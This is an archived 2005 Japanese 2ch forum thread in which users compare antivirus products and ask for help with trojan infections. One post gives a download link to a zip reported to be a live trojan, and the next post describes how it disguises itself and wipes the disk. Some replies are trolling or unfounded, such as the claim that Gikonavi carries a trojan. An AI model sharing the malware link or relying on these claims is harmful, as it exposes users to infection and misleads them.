NOD３２で検出かけた後、パンダフリーでこれだけ検出された
スパイウェアはSPYBOTとADARAEで検出されなかったのがでた
超ｼｮｯｸ＿|￣|○NOD３２・・・
913 ：名無しさん＠お腹いっぱい。 ：2005/07/11(月) 21:20:10: ESETをデフォルト設定で使ってるとスパイウェアは検出しないのでは？
914 ：名無しさん＠お腹いっぱい。 ：2005/07/11(月) 21:36:33: ESET Tackles Spyware with NOD32 Version 2.5;
Receives Checkmark Certification

スパイウェア関係の検出力は高いみたいなのにね。
その前にESETのサイトに日本語版がないのは何故？
915 ：名無しさん＠お腹いっぱい。 ：2005/07/14(木) 10:45:54: ●米Webサイト“Download.com”で配布されていた「Daemon Tools」にウイルス混入●
ttp://www.forest.impress.co.jp/article/2005/07/14/dtoolsdlcom.html
※7月14日時点で対応しているアンチウイルス製品
Kaspersky
ttp://www.viruslist.com/en/alerts?alertid=166119889
ノートン
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.gregcenter.html
マカフィー
ttp://www.mcafeesecurity.com/japan/security/virG2004.asp?v=W32/GregCenter

【・NOD32は未対応】
916 ：名無しさん＠お腹いっぱい。 ：2005/07/14(木) 12:36:55: Trojan
http://www.boardsmag.com/screeningroom/commercials/1794/
917 ：名無しさん＠お腹いっぱい。 ：2005/07/14(木) 15:58:58: >>914
キャノンが怠慢だから
918 ：名無しさん＠お腹いっぱい。 ：2005/07/15(金) 13:08:20: >>915
＞なお、窓の杜ではアーカイブをライブラリに掲載する際に、
＞ウイルス対策ソフトを3本常駐させたパソコンでアーカイブのチェックを入念に行っている。

3本常駐って・・・そんなことできるのか？
919 ：名無しさん＠お腹いっぱい。 ：2005/07/15(金) 13:20:50: >>918
そんなこと書いてあったのか。
仮に見た目問題が出ないとしても絶対にやらないよな。
窓の社ってアホの集まりだったんだなw
920 ：名無しさん＠お腹いっぱい。 ：2005/07/15(金) 16:39:11: >>918
ノートンあたりと、BitDefenderとClamWinの組み合わせとかじゃないか。
BitとClamは、常駐保護機能はないけど、
うｐだてとかのために常駐するプロセスがあるから、
＞ウイルス対策ソフトを3本常駐させたパソコン
という表現は間違ってはいない。
921 ：名無しさん＠お腹いっぱい。 ：2005/07/15(金) 17:23:59: >>920
情けないフォローの社員乙。
922 ：名無しさん＠お腹いっぱい。 ：2005/07/15(金) 17:30:52: 前に３つのソフトの名前が出てたけど、普通に常駐保護機能のある奴だったと思ったが。
それならむしろ、本体、VMware、VirtualPCにそれぞれインスコとか。
923 ：922 ：2005/07/15(金) 17:33:57: # Norton AntiVirus 2005
# ウイルスバスター2005 インターネットセキュリティ
# NOD32アンチウイルス

だった。
ttp://www.forest.impress.co.jp/announce/20050606.html
924 ：名無しさん＠お腹いっぱい。 ：2005/07/15(金) 18:22:10: うむ、常駐保護っつー言葉がおかしい気はするけど
体験版を仮想OSに入れて、本OSのﾀﾞｳｿﾌｫﾙﾀﾞを仮想OSと共有するのは基本だとおも
925 ：名無しさん＠お腹いっぱい。 ：2005/07/15(金) 18:22:34: 常駐保護→常駐させた
926 ：名無しさん＠お腹いっぱい。 ：2005/07/16(土) 16:12:24: 2ちゃんで踏んだんだけど、突然「Ｅｒｒｏｒ＃317　Ｓｅｃｕｒｉｔｙ　Ｗａｒｒｎｉｎｇ」とでるし
勝手にデスクトップにＨｏｔｘというショートカットができて
それがけしてもけしても現れるんだだが　　どうにもならない？
927 ：名無しさん＠お腹いっぱい。 ：2005/07/16(土) 16:16:24: http://pc8.2ch.net/test/read.cgi/sec/1120529277/361
928 ：名無しさん＠お腹いっぱい。 ：2005/07/16(土) 17:19:22: >>927 しょうがないじゃん、誰も答えてくれないんだから
929 ：名無しさん＠お腹いっぱい。 ：2005/07/16(土) 17:28:05: いいか、Googleをうまく使え
930 ：名無しさん＠お腹いっぱい。 ：2005/07/16(土) 18:39:07: キンタマってHDD内にzip32.dllとかzip32j.dllがない場合には動作できないんですか？
Expolorerは使ってないので不要なdllはuncaldixで削除しているんですが。
931 ：名無しさん＠お腹いっぱい。 ：2005/07/16(土) 18:41:08: http://tmp5.2ch.net/test/read.cgi/download/
932 ：名無しさん＠お腹いっぱい。 ：2005/07/17(日) 11:02:20: >>919
>窓の社ってアホの集まりだったんだなw

アホはおまいだｗ
社じゃねーよ杜だよ！
933 ：名無しさん＠お腹いっぱい。 ：2005/07/17(日) 15:10:08: メモリにTROJ_Agent.DBが感染してるんだけど、ぐぐっても削除方法がわからない
誰か助けて(;つД｀)

XP（sp2）　NOD32
934 ：名無しさん＠お腹いっぱい。 ：2005/07/17(日) 15:23:09: ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=59077
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.conycspa.g@mm.html
？
935 ：名無しさん＠お腹いっぱい。 ：2005/07/18(月) 23:38:46: 2005/07/18 23:26:33,スーパーバイザ,未使用 Windows サービス遮断を検出して遮断しました。
××.××.×××.××× とのすべての通信は 2880 分間にわたって遮断されます。"

nisでこういう表示が一日１回は出るのですが
多すぎでしょうか？
936 ：名無しさん＠お腹いっぱい。 ：2005/07/19(火) 06:56:09: http://www.cybersyndrome.net/whois.html
ここでIPアドレスから相手の情報を探れるぞ。
出てくるのは外国ばっかだけどな。
取れた情報を元にファイアーウォールかけとけばいいと思う。
937 ：９３６ ：2005/07/19(火) 07:04:20: サイトに飛ばなかった場合はそのURLを手打ちで。
938 ：名無しさん＠お腹いっぱい。 ：2005/07/19(火) 19:38:44: >>933
NOD32対応してないか？
ttp://www.eset.com/support/info.htm

＞NOD32 - v.1.1134 (20050608)
＞ Win32/TrojanDownloader.Zdesnado, Win32/TrojanDownloader.Zdesnado.T

＞NOD32 - v.1.1007 (20050223)
＞Win32/TrojanDownloader.Zdesnado.N

＞NOD32 - v.1.1006 (20050222)
＞Win32/TrojanDownloader.Zdesnado.F
939 ：名無しさん＠お腹いっぱい。 ：2005/07/21(木) 22:39:26: 初心者です。
どうやらTROJ_SMALL.GOに感染したようです。
ネットも他のプログラムも使えない状態です。
（今は携帯から）
どうしたらよいでしょうか？
検索もできなくて…
940 ：名無しさん＠お腹いっぱい。 ：2005/07/22(金) 02:04:28: 同じく初心者です。
PC立ち上げたら「JS/Exploit-HelpXSiteに感染してたから駆除した」
というメッセージが出たんですが、
駆除されたらもう大丈夫なんですかね？
mcafeeのHP見てもよくわからなかったもので・・・。
一応スキャンはしました。

教えて！エロい人。
941 ：名無しさん＠お腹いっぱい。 ：2005/07/22(金) 03:46:47: 前スレはよいスレだったんだけどなぁ・・・。
>>939
ウィルスやトロイは感染してしまったらもうおしまいと思った方がよいですよ。
それか、対処できるような知識を身に付けてください。
検出名がわかっているということは、情報はあるはずですからね。
942 ：名無しさん＠お腹いっぱい。 ：2005/07/22(金) 03:52:54: >>940
あなたの場合、アンチウィルスソフトが防いでくれたようですが
必ず検出されたものはログファイルに記録されているはずです。
まずはその見方を覚えてください。

見る時に重要なことは、検出名とファイルの名前、それと検出された場所です。
駆除したという報告があるならば見つかった場所にはもう感染した
ファイルは無いはずです。それを確認できたら念のために
ハードディスク全体をスキャンします。それで何も検出されなければ
とりあえず安心しても良いでしょう。
943 ：名無しさん＠お腹いっぱい。 ：2005/07/22(金) 04:03:56: なんで初歩的な事をいちいち教えてる訳？
はぁあぁぁああ
944 ：名無しさん＠お腹いっぱい。 ：2005/07/22(金) 20:35:19: テンプレにもあるSwat It、フリーで常駐保護ありって聞いてｲﾝｽｺしてみたんだが

1 Scanタブで指定フォルダ内ファイルをスキャン
2 Processタブでプロセスの強制終了(実行ファイルのあるフォルダを開く等も可)
3 Updateタブで定義ファイルアップデート

までは分かったんだけど、これ常駐保護機能って具体的に何をしているんでしょ？
Settingsタブにもそれっぽい項目が何もないし、何か常駐保護されてる気がしないんだけど…

うーん、漏れが頭悪いだけだったら申し訳ない
945 ：　：2005/07/24(日) 23:43:30: >>944
Swat Itのフリー版は常駐保護はないよ
946 ：名無しさん＠お腹いっぱい。 ：2005/07/25(月) 15:30:14: さっきノートンがコンピュータ上にトロイを発見したってでてきたんだけど
適用した処理がファイルを修復できませんってでてきた
これってまだ残ってるってことだよな？
誰か解決法教えてください
調べたりしていろいろやってみてるけど何度ウイルスチェックしても引っかからないし…
947 ：名無しさん＠お腹いっぱい。 ：2005/07/25(月) 16:23:57: ログ見ないと分からないけど修復できないから、削除したんじゃない？
気になるなら、Antidote 辺りを使って、セーフモードでスキャンしてみるとか。
948 ：946 ：2005/07/25(月) 16:45:33: そのあとＯＫ押したらアクセスが拒否されましたともでてきたんで不安です…
Antidoteってのはフリーのはないんですか？落とせません
949 ：946 ：2005/07/25(月) 17:00:28: Antidone落とせました、セーフモードでやってみます
950 ：名無しさん＠お腹いっぱい。 ：2005/07/26(火) 18:17:37: なにげなくregprotいれてみたんだが、ことあるごとにpowerbarとかでる。しかも二つ。
これって何事？どう対処すれば
951 ：名無しさん＠お腹いっぱい。 ：2005/07/26(火) 18:37:34: >>938
7月26日からWindows Server 2003がSP1へ自動更新されるようになりますがNOD32はSP1にまだ未対応。
SP1にアップデートすると通信不能となり最悪の場合OSがリブートの繰り返しとなるので注意。
http://canon-sol.jp/product/nd/nd_server2003.html
952 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 06:58:43: 某スレでの報告だが、モノホンのトロイのようだ
ttp://vladimir.ddo.jp:8888/cgi-bin/ane/src/ane1049.zip

ノートンすら反応しねえ…
953 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 06:59:45: アイコンがフォルダーアイコンに偽装されてて
ファイル名が「かおる姫　　　　　　　　　　　　　　　　　　　.exe」になってた。
スペース入れてファイル名が長かった為、ファイル名全部表示されずついWクリ。
もしくは拡張子表示してないのでWクリ。
実行すると「殺してやる!.exe」ってのがスタートアップフォルダーに追加され再起動の時点で実行される。
そんでもってHDD内あぼーん。
954 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 07:46:08: >>952-953
アンチウィルスソフトに頼りきりのやつはとりあえず入れておけ。
フォルダ偽装なら馬鹿でも100%防げるようになるぞ。
ProcessGuard Free
http://www.diamondcs.com.au/processguard/index.php?page=download

一応専用スレ
ProcessGuard
http://pc8.2ch.net/test/read.cgi/sec/1118056531/
955 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 09:16:45: ノートンすら反応しねえ…
ノートンすら反応しねえ…
ノートンすら反応しねえ…
ノートンすら反応しねえ…
ノートンすら反応しねえ…

ノートン(笑)だからだろｗ
956 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 09:26:09: >>955
おすすめソフト教えて
957 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 12:31:41: >>956
>>954
アンチウイルスに頼り切るなよ。
ノートンはヒューリスティックより、シグネチャに重きを置いてるソフトなんだから
新種のウイルスを検出しにくいのは当たり前だろ。
958 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 12:46:53: 変な事吹き込むなよ。アフォユーザ減ったら踏み台減っちゃうだろ＾－＾
959 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 19:15:12: >>952
なんかAVGが反応したぞ
960 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 19:31:28: まぁ、重きっつーかノートンのヒューリスティクはマジで酷すぎだけどな
NODが大喜びしてたランキング（URL忘れた）でフリーソフト以下だった記憶が・・・
961 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 19:40:32: どこへ行ってもいる比較厨ほんとにうざっ！
962 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 20:45:54: なんだ、ﾉｰﾄｿ厨か？ｗ
別に漏れも順位とかには興味ねーが、自分が使ってるソフトの弱点くらい知っておけよ。
ﾉｰﾄｿじゃ定義ファイルにないウイルスはまず見つからん
963 ：名無しさん＠お腹いっぱい。 ：2005/07/28(木) 21:14:42: 溺れる者は藁をもつかむ
964 ：名無しさん＠お腹いっぱい。 ：2005/07/29(金) 23:55:13: TDS-3が開発中止になったみたいですね。
フリー版を試してみたかったけど、ダウンロードできなくなってた。
965 ：名無しさん＠お腹いっぱい。 ：2005/08/09(火) 10:13:24: ヒューリスティクだとABONEになるだろが！
用語は正しく使いましょう。
966 ：名無しさん＠お腹いっぱい。 ：2005/08/09(火) 12:12:09: 虹色キンタマ発生
http://tmp5.2ch.net/test/read.cgi/download/1122198484/
802 名前：通報屋 ◆Y39/vakKjY [sage] 投稿日：2005/08/09(火) 01:19:03 ID:D+6ug8Vx0
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: C:\Virus\uporg165729\今月分ロリ詰め合わせ01.bin
結果: このファイルは次のウィルスに感染しています: Trojan Horse
デベロッパーノート
ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、
ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、
このメールの末尾に書かれた手順にしたがってインストールしてください。
先生緊急対応。
Trendには連絡済み。

207 名前：番組の途中ですが名無しです　[sage]　投稿日：2005/08/09(火) 10:07:29 ID:VF4CpZQu0
ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイル
ス、ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしまし
たので、このメールの末尾に書かれた手順にしたがってインストールしてください。

個別対応した定義ファイルをダウンロードしてインストールする方法：
1. Web ブラウザを起動します。
2. この FTP サイト:
ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe
へのリンクを
クリックしてください。
967 ：名無しさん＠お腹いっぱい。 ：2005/08/29(月) 09:26:26: トロイの木馬ってなんですか☆教えて下さい２ｃｈの屑ども
968 ：名無しさん＠お腹いっぱい。 ：2005/08/29(月) 10:02:24: >>967
検索して出直せ。
969 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 14:22:36: なんかギコナビのファイルにトロイがいたらしい。
しかもavastだから余計に不安なんだけど。
970 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 14:43:02: >>969
ギコナビにトロイが仕込まれているのは
有名な話だが。
971 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 15:21:33: >>970え？本当ですか？初めて聞きました…
なんかブラウザ特集のページからDLしたんですが。
ヤバイですよね？
どのような被害が考えられますか？
972 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 17:25:46: >>971
ウイルスよりトロイの方がやっかい。
わかるだろ？
リカバリー汁。
973 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 18:56:34: おりも気になってシマンテックで検索したら
VBS.LoveLetter.Aにやられてた。
974 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 21:43:34: >>972一応削除したけど、リカバリかけた方が良いですかね？
975 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 21:51:00: >>974
俺はavast使ったことないからよく知らんが、ノートントラップみたいな誤検出じゃないのか？
頻繁に再起動するとか、異様に重いとか、FWのログに異常があるとか、そういう具体的な異常があるの？
無いのなら、誤検出の線で疑ったほうがいいと思う。
とりあえず、検出されたウイルス名と場所を、フルパスで書いてみ。
976 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 22:00:28: ADやスパボでは何も検出されなかったけど
ewido暇つぶしにインスコしたらトロイが金玉、失礼、
しこたま出てきた。
>>973と同じワームも検出されたｗ
977 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 22:02:14: ログの特定文字列を検出するノートントラップな訳だが
978 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 22:10:18: avast!のログファイル( .dat )誤検出例
Win32:Mhtplo-8[Trj]
Win32:Mhtplo-26[Trj]
979 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 22:37:47: >>975ファイルは分かりません削除ログが見れなくて。

しかし、DL板の猫に小判なサイト掲載の怪しい英語サイトにアクセスした時にトロイの木馬をブロックしましたってウインドが出たから、
それから感染したのかな。
マジでリカバリしたが吉かな…

なんか潜伏するんですよね
980 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 22:38:53: >>976
http://violet.homeip.net/upload/img-box/img20050829205112.jpg
981 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 22:40:01: >>979
潜在＆形を変えての増殖
ヤヴァイよ。
982 ：名無しさん＠お腹いっぱい。 ：2005/08/30(火) 22:46:51: >>981安いし市販のウィルスセキュリティ2005EX買おうかなと思った矢先ですが、検疫率はavastより下なんだよな。

駆除も大変そうだから明日リカバリかけますわ～
983 ：名無しさん＠お腹いっぱい。 ：2005/08/31(水) 18:22:16: >>982
デラックス　ヤヴァス！